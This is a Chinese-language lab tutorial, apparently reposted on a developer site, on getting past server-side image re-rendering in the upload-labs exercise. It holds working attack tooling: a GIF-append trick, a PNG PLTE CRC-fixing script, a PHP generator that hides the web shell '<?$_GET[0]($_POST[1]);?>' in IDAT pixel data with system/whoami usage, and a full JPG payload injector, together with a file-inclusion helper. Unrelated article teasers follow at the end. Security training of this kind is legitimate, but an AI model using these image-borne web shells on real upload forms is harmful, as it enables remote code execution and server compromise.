【文件上传绕过】——二次渲染漏洞_二次渲染绕过-程序员宅基地
文章目录
一、实验目的:
1、通过实验学习二次渲染原理的成因。
2、通过搭建漏洞环境,学习绕过技巧。
二、漏洞说明:
1. 二次渲染原理:
在我们上传文件后,网站会对图片进行二次处理(格式、尺寸要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片并放到网站对应的标签进行显示。
2. 绕过:
1、配合文件包含漏洞:
将一句话木马插入到网站二次处理后的图片中,也就是把一句话插入图片在二次渲染后会保留的那部分数据里,确保不会在二次处理时删除掉。这样二次渲染后的图片中就存在了一句话,在配合文件包含漏洞获取webshell。
2、可以配合条件竞争:
这里二次渲染的逻辑存在漏洞,先将文件上传,之后再判断,符合就保存,不符合删除,可利用条件竞争来进行爆破上传
点我进入条件竞争漏洞
3. 如何判断图片是否进行了二次处理?
对比要上传图片与上传后的图片大小,编辑器打开图片查看上传后保留了拿些数据
三、工具:
火狐/谷歌浏览器
010 Editor16进制编辑器
四、实验环境:
靶 机: windows10虚拟机:
192.168.100.150
upload-labs-master闯关游戏
phpstudy2013搭建网站
攻击机: 物理机
五、准备环境:
1、在upload-labs-master闯关游戏upload目录下创建一个文件包含脚本include_image.php:
注:主要是通过这个include_image.php文件包含图片马,把图片马解析为php脚本文件。
内容:
<%php
$file=$_GET['file'];
include $file;
%>
六、页面源码:
页面源码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=UPLOAD_PATH.basename($filename);
// 获得上传文件的扩展名
$fileext= substr(strrchr($filename,"."),1);
//判断文件后缀与类型,合法才进行上传操作
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path))
{
//使用上传的图片生成新的图片
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "该文件不是jpg格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".jpg";
$newimagepath = UPLOAD_PATH.$newfilename;
imagejpeg($im,$newimagepath);
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.$newfilename;
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "png") && ($filetype=="image/png")){
if(move_uploaded_file($tmpname,$target_path))
{
//使用上传的图片生成新的图片
$im = imagecreatefrompng($target_path);
if($im == false){
$msg = "该文件不是png格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".png";
$newimagepath = UPLOAD_PATH.$newfilename;
imagepng($im,$newimagepath);
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.$newfilename;
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "gif") && ($filetype=="image/gif")){
if(move_uploaded_file($tmpname,$target_path))
{
//使用上传的图片生成新的图片
$im = imagecreatefromgif($target_path);
if($im == false){
$msg = "该文件不是gif格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".gif";
$newimagepath = UPLOAD_PATH.$newfilename;
imagegif($im,$newimagepath);
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.$newfilename;
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else{
$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
}
}
七、GIF绕过:
1、创建一个a.php的脚本文件:
内容:
<?php phpinfo(); ?>
2、在cmd命令行中,使用以下命令把1.gif和a.php合成图片马2.gif:
命令:
copy 1.gif /b + a.php /a 2.gif:
3、使用010 Editor16进制编辑器查看2.gif内容,可以看出php代码已经插入图片马中了:
4、上传图片马,并复制图片链接进行查看:
5、右击复制图片,将图片下载到本地:
6、使用010 Editor16进制编辑器打开图片,发现末尾的php代码没有了:
GIF绕过二次渲染的方法,就是通过对比上传前和上传后的两个文件,如果说哪个位置,它的上传前和上传后的没有变,我们就把php一句话代码插入到这个位置。
7、使用010 Editor16进制编辑器打开上传前的文件和上传后的文件,并对文件进行比较:
8、过观察,发现蓝色部分就是没有改变的地方:
我们最开始通过cmd命令制作的gif图片马,在我们上传过后,经过二次渲染生成的gif,通过对这两个文件进行对比,发现蓝色部分数据没有变化,我们就可以在没有改变的地方,也就是蓝色部分,插入我们的恶意代码。
9、在数据没有变化的地方插入php代码,并对这个文件进行保存:
10、使用修改后的文件重新进行上传:
11、图片下载到本地,查看php代码是否存在,通过查看我们的PHP代码发现未被过滤:
八、PNG绕过:
1. png图片组成:
png图片由3个以上的数据块组成。
PNG定义了两种类型的数据块,一种是称为关键数据块(critical chunk),这是标准的数据块,另一种叫做辅助数据块(ancillary chunks),这是可选的数据块。
关键数据块定义了3个标准数据块(IHDR,IDAT, IEND),每个PNG文件都必须包含它们。
1.1 数据块结构:
| 字 段 名 | 大小(单位:字节) | 描 述 |
|---|---|---|
| Length(长度) | 4 | 指定数据块中的数据长度 |
| Chunk Type Code(数据块类型码) | 4 | 数据块类型,例如:IHDR、PLTE、IDAT等 |
| Chunk Data(数据块数据) | Length | 存储数据 |
| CRC(循环冗余检测) | 24 | 循环冗余码 |
CRC(cyclic redundancy check)域中的值是对Chunk Type Code域和Chunk Data域中的数据进行计算得到的。CRC具体算法定义在ISO 3309和ITU-T V.42中,其值按下面的CRC码生成多项式进行计算:
x32+x26+x23+x22+x16+x12+x11+x10+x8+x7+x5+x4+x2+x+1
1.2 分析数据块:
1.2.1 IHDR:
数据块
IHDR(header chunk):它包含有PNG文件中存储的图像数据的基本信息,并要作为第一个数据块出现在PNG数据流中,而且一个PNG数据流中只能有一个文件头数据块。
文件头数据块由13字节组成,它的格式如下表所示:
| 字段名 | 大小(单位:字节) | 描 述 |
|---|---|---|
| Width | 4 | 图像宽度,以像素为单位 |
| Height | 4 | 图像宽度,以像素为单位 |
| Bit depth | 1 | 图像深度:索引彩色图像:1,2,4或8灰度图像:1,2,4,8或16真彩色图像:8或16 |
| Color Type | 1 | 颜色类型:0:灰度图像,1,2,4,8或162:真彩色图像,8或163:索引彩色图像,1,2,4或84:带α通道数据的灰度图像,8或166:带α通道数据的真彩色图像,8或16 |
| Compression method | 1 | 压缩方法(LZ77变种算法) |
| Filter method | 1 | 滤波器方法 |
| Interlace method | 1 | 隔行扫描方法:0:非隔行扫描1: Adam7(由Adam M.Costello开发的7遍隔行扫描方法) |
1.2.2 PLTE:
调色板PLTE数据块是辅助数据块,对于索引图像,调色板信息是必须的,调色板的颜色索引从0开始编号,然后是1、2……,调色板的颜色数不能超过色深中规定的颜色数(如图像色深为4的时候,调色板中的颜色数不可以超过2^4=16),否则,这将导致PNG图像不合法。
1.2.3 IDAT:
图像数据块IDAT(image data chunk):它存储实际的数据,在数据流中可包含多个连续顺序的图像数据块。
IDAT存放着图像真正的数据信息,因此,如果能够了解IDAT的结构,我们就可以很方便的生成PNG图像。
1.2.4 IEND:
图像结束数据IEND(image trailer chunk):它用来标记PNG文件或者数据流已经结束,并且必须要放在文件的尾部。如果我们仔细观察PNG文件,我们会发现,文件的结尾12个字符看起来总应该是这样的:
00 00 00 00 49 45 4E 44 AE 42 60 82
2. 在PNG图片中写入php代码的几种方式:
2.1 在PLTE数据块写入php代码.:
php底层在对PLTE数据块验证的时候,主要进行了CRC校验。所以可以在chunk data域插入php代码,然后重新计算相应的crc值并修改即可。
这种方式只针对索引彩色图像的png图片才有效,在选取png图片时可根据IHDR数据块的color type辨别03为索引彩色图像。
1、查看png图片的IHDR数据块的color type是否为03,下图可以看出26.png的color type索引为03,是索引彩色图像:
2、在PLTE数据块写入php代码,并保存:
3、在和26.png的同一个目录下创建一个crc.py的脚本文件:
内容:
import binascii
import re
png = open(r'26.png','rb')
a = png.read()
png.close()
hexstr = binascii.b2a_hex(a)
''' PLTE crc '''
data = '504c5445'+ re.findall('504c5445(.*?)49444154',hexstr)[0]
crc = binascii.crc32(data[:-16].decode('hex')) & 0xffffffff
print hex(crc)
4、计算PLTE数据块的CRC:
命令:
python2 CRC.py
可以得出PLTE数据块的CRC的值为:6c 18 e5 8f,不需要前面的0x和后面的L:
0x6c18e58fL
# 0x开始表示这一串数字是以16进制表示的
# L代表这是一个长整形的数
5、修改PLTE数据块的CRC值:
注:可以先搜索tRNS,因为PLTE数据块的CRC的值的属性就在tRNS块的前面:
6、把使用python脚本计算出的PLTE数据块的CRC的值替换掉上图红框框中的值,并保存:
7、上传26.png文件到服务器中,并进行访问:
8、将图片下载到本地,查看插入的代码是否还在:
9、可以看出,php代码没有被过滤:
2.2 使用php脚本写入IDAT数据块:
1、创建一个IDAT_png.php(通过这个脚本生成一个绕过渲染的图片马):
脚本内容:
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'./1.png');
?>
2、使用IDAT_png.php脚本生成1.png的图片马:
命令:
php IDAT_png.php 26.png
3、上传1.png图片马到服务器:
4、可以访问成功:
5、下载图片马到本地,并进行查看代码:
图片马里面的代码为:
<?$_GET[0]($_POST[1]);?>
6、通过下面的方式执行命令(这里结合文件包含):
get传参0=system
加上
post传参1=whoami
九、JPG绕过:
1、创建一个jpg_payload.php脚本(用于生成绕过二次渲染的图片马):
注:由于jpg图片易损,对图片的选取有很大关系,很容易制作失败,需要多选取几张图片进行生成。
脚本内容:
<?php
/*
The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().
It is necessary that the size and quality of the initial image are the same as those of the processed image.
1) Upload an arbitrary image via secured files upload script
2) Save the processed image and launch:
jpg_payload.php <jpg_name.jpg>
In case of successful injection you will get a specially crafted image, which should be uploaded again.
Since the most straightforward injection method is used, the following problems can occur:
1) After the second processing the injected data may become partially corrupted.
2) The jpg_payload.php script outputs "Something's wrong".
If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.
Sergey Bobrov @Black2Fan.
See also:
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
*/
$miniPayload = "<?=phpinfo();?>";
if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
die('php-gd is not installed');
}
if(!isset($argv[1])) {
die('php jpg_payload.php <jpg_name.jpg>');
}
set_error_handler("custom_error_handler");
for($pad = 0; $pad < 1024; $pad++) {
$nullbytePayloadSize = $pad;
$dis = new DataInputStream($argv[1]);
$outStream = file_get_contents($argv[1]);
$extraBytes = 0;
$correctImage = TRUE;
if($dis->readShort() != 0xFFD8) {
die('Incorrect SOI marker');
}
while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
$marker = $dis->readByte();
$size = $dis->readShort() - 2;
$dis->skip($size);
if($marker === 0xDA) {
$startPos = $dis->seek();
$outStreamTmp =
substr($outStream, 0, $startPos) .
$miniPayload .
str_repeat("\0",$nullbytePayloadSize) .
substr($outStream, $startPos);
checkImage('_'.$argv[1], $outStreamTmp, TRUE);
if($extraBytes !== 0) {
while((!$dis->eof())) {
if($dis->readByte() === 0xFF) {
if($dis->readByte !== 0x00) {
break;
}
}
}
$stopPos = $dis->seek() - 2;
$imageStreamSize = $stopPos - $startPos;
$outStream =
substr($outStream, 0, $startPos) .
$miniPayload .
substr(
str_repeat("\0",$nullbytePayloadSize).
substr($outStream, $startPos, $imageStreamSize),
0,
$nullbytePayloadSize+$imageStreamSize-$extraBytes) .
substr($outStream, $stopPos);
} elseif($correctImage) {
$outStream = $outStreamTmp;
} else {
break;
}
if(checkImage('payload_'.$argv[1], $outStream)) {
die('Success!');
} else {
break;
}
}
}
}
unlink('payload_'.$argv[1]);
die('Something\'s wrong');
function checkImage($filename, $data, $unlink = FALSE) {
global $correctImage;
file_put_contents($filename, $data);
$correctImage = TRUE;
imagecreatefromjpeg($filename);
if($unlink)
unlink($filename);
return $correctImage;
}
function custom_error_handler($errno, $errstr, $errfile, $errline) {
global $extraBytes, $correctImage;
$correctImage = FALSE;
if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
if(isset($m[1])) {
$extraBytes = (int)$m[1];
}
}
}
class DataInputStream {
private $binData;
private $order;
private $size;
public function __construct($filename, $order = false, $fromString = false) {
$this->binData = '';
$this->order = $order;
if(!$fromString) {
if(!file_exists($filename) || !is_file($filename))
die('File not exists ['.$filename.']');
$this->binData = file_get_contents($filename);
} else {
$this->binData = $filename;
}
$this->size = strlen($this->binData);
}
public function seek() {
return ($this->size - strlen($this->binData));
}
public function skip($skip) {
$this->binData = substr($this->binData, $skip);
}
public function readByte() {
if($this->eof()) {
die('End Of File');
}
$byte = substr($this->binData, 0, 1);
$this->binData = substr($this->binData, 1);
return ord($byte);
}
public function readShort() {
if(strlen($this->binData) < 2) {
die('End Of File');
}
$short = substr($this->binData, 0, 2);
$this->binData = substr($this->binData, 2);
if($this->order) {
$short = (ord($short[1]) << 8) + ord($short[0]);
} else {
$short = (ord($short[0]) << 8) + ord($short[1]);
}
return $short;
}
public function eof() {
return !$this->binData||(strlen($this->binData) === 0);
}
}
?>
2、使用上面创建的脚本生成一个图片马:
命令:
php jpg_payload.php a.jpg
3、使用16进制编辑器打开,就可以看到插入的php代码:
4、上传图片马payload_a.jpg到服务器,并查看:
5、下载图片马到本地,并使用16进制编辑器打开查看php代码,发现没有被过滤:
智能推荐
CentOS7运行报错kernel:NMI watchdog: BUG: soft lockup - CPU#0 stuck for 26s_message from syslogd@centos at jul 17 18:36:38 ...-程序员宅基地
文章浏览阅读2k次。CentOS7运行报错kernel:NMI watchdog: BUG: soft lockup - CPU#0 stuck for 26sCentOS内核,对应的文件是/proc/sys/kernel/watchdog_thresh。CentOS内核和标准内核还有一个地方不一样,就是处理CPU占用时间过长的函数,CentOS下是watchdog_timer_fn()函数。如果你的内核是标准内核的话,可以通过修改/proc/sys/kernel/softlockup_thresh来修改超时的阈值参考_message from syslogd@centos at jul 17 18:36:38 ... kernel:nmi watchdog: bug:
https访问协议的配置和使用_请使用安全协议进行访问-程序员宅基地
文章浏览阅读3.1k次。以前,我们的web网站服务访问一直是以http协议为基础进行访问的!但是这种访问协议在后来的生产实践中,被认证为不安全的访问协议!之后,互联网领域针对这种不安全的访问方式,提出了https安全访问协议的方式进行访问!在新开发的网站中,我这边都将访问协议配置为https的安全访问协议的方式访问网站!一直没有时间整理关于这方面的实践步骤!最近,时间相对比较充裕,抽出了一部分时间,整理一下这方面的东西..._请使用安全协议进行访问
startActivity启动过程分析和Activity生命周期-程序员宅基地
文章浏览阅读2.1k次。一、startActivity启动过程启动流程:点击桌面App图标,Launcher进程采用Binder IPC向system_server进程发起startActivity请求;system_server进程接收到请求后,向zygote进程发送创建进程的请求;Zygote进程fork出新的子进程,即App进程;App进程,通过Binder IPC向sytem_server进程发起a..._startactivity
0基础怎么自学编程?零基础自学编程应该怎么学-程序员宅基地
文章浏览阅读3.2k次。零基础想要学习编程,第一步首先决定要学哪一门语言,了解它们的特点和应用的领域;第二步确定学习方法,自学还要结合一些辅助资料或工具;第三步,调整良好的心理状态,为学习编程创建一个稳定的心理环境。_零基础自学编程
等价类,边界值,场景法的使用方法和运用场景_等价类适用于什么场景-程序员宅基地
文章浏览阅读895次,点赞17次,收藏14次。在很多情况下,很多人想到的测试方法是穷举测试,穷举测试是最全面的测试,但是数据量很大的情况下不太现实,测试效率太低,后来为了减少测试人员的工作量和提高测试的效率和以达到最好的测试质量,慢慢的就有了等价类的测试方法。1)划分等价类 一, 应按照输入条件(如输入值的范围,值的个数,值的类型,输入的条件如何等),划分有效输入和无效输入(有效等价类和无效等价类) ,总的来说,需求以内的都属于有效输入,需求以外的都属于无效输入。则需要测试的边界值为:1个字符,2个字符,3个字符,8个字符,9个字符,10个字符。_等价类适用于什么场景
STM32 C 语言和汇编语言混合编程_stm32 c语言可以嵌入汇编语言-程序员宅基地
文章浏览阅读399次。目录一、C语言调用汇编函数二、将原汇编语言 Init_1函数的类型改为 int Init_1(init) ,此函数功能修改为 传入一个整型数x,函数运行后返回整型数 x+100三、在汇编函数中调用一个 C语言写的函数四、总结五、参考链接:MDK下C与汇编语言混合编程 - the7一、C语言调用汇编函数 1.打开keil 5新建工程 2.右击Source Group1 添加新项目3.点击 Asm File(.s) ,输入na..._stm32 c语言可以嵌入汇编语言
随便推点
【MySQL】在centOS上安装MySQL5.7,并设置允许用户远程登录_centos mysql5.7允许远程连接命令-程序员宅基地
文章浏览阅读2.7k次。打开终端(Ubuntu的快捷键Ctrl+Alt+T在这里不适用,可以自定义.但我没找到Run a terminal).使用RPM方式安装:1. wget http://dev.mysql.com/get/mysql-community-release-el7-5.noarch.rpm(Linux系统中的wget是一个下载文件的工具,用在命令行下,是World,Wide,Web和get..._centos mysql5.7允许远程连接命令
纯新手 docker langchain Qwen1.5 部署-程序员宅基地
文章浏览阅读1.8k次,点赞16次,收藏27次。使用下载的镜像,启动容器,使用modelscope命令下载。模型:Qwen1.5-Qwen-7B-Chat。镜像:qwenllm/qwen:cu121。【新手入门,多有遗漏,私信交流】文件后缀改为 .py 文件。3、安装langchain。_qwen1.5 部署
混合粒子群的混沌蝴蝶优化算法_cubic混沌映射-程序员宅基地
文章浏览阅读4.3k次,点赞4次,收藏37次。为了解决蝴蝶优化算法(BOA)精度低、收敛速度慢的问题,研究的趋势是将两种或两种以上的算法混合,以获得优化问题的最优解。提出了一种新的混合算法HPSOBOA,并介绍了三种改进基本BOA的方法。因此,引入了利用Cubi映射对BOA进行初始化,并采用非线性参数控制策略。此外,将粒子群优化(PSO)算法与BOA算法相结合,改进了基本的BOA算法,使其能够进行全局优化。函数测试实验验证了该算法的有效性。实验结果表明,与GWO、BOA等算法相比,混合HPSOBOA算法收敛速度快,在高维数值优化问题中具有更好的稳定性。_cubic混沌映射
设置网络流量监测图形分析工具Cacti管理Windows Server 2008 R2-程序员宅基地
文章浏览阅读76次。如何安装Cacti,见前文Hyper-v下安装网络流量监测图形分析工具 Cacti 在Windows Server 2008以后的版本中,SNMP是以一个功能的形式存在的,不像Windows Server 2003里中是以Windows组件的形式存在的,所以安装的方法也不一样。您可以参照下面的步骤来安装SNMP服务。 1 打开服务器管理器,点击功能节点,点击..._网络流量分析工具 winserver2008r2
机器翻译和自动译后编辑_机器翻译输出指定样式怎么设置-程序员宅基地
文章浏览阅读509次。机器翻译工具通过NLP自然语言处理将一种语言翻译成另一种语言,机器翻译随着科技进步已经不仅仅局限于文字翻译,现在我们可以通过语音进行翻译还可以与机器人进行料体聊天。这些都是机器翻译的应用。..._机器翻译输出指定样式怎么设置
一文了解DevExpress:让.NET应用开发更简单、更强大_devexpress是什么软件-程序员宅基地
文章浏览阅读1.2k次,点赞41次,收藏15次。DevExpress(Developer Express Inc.)是一家知名的软件开发公司,提供一系列用于.NET框架的软件开发工具和组件,特别是针对桌面、网页以及移动平台的应用开发。DevExpress的产品有助于开发人员构建复杂的用户界面、提升应用程序的性能和可用性,以及提高开发效率。:用于构建Windows窗体应用程序的一套丰富的用户界面控件。:提供用于Windows Presentation Foundation(WPF)应用程序的高性能用户界面组件。_devexpress是什么软件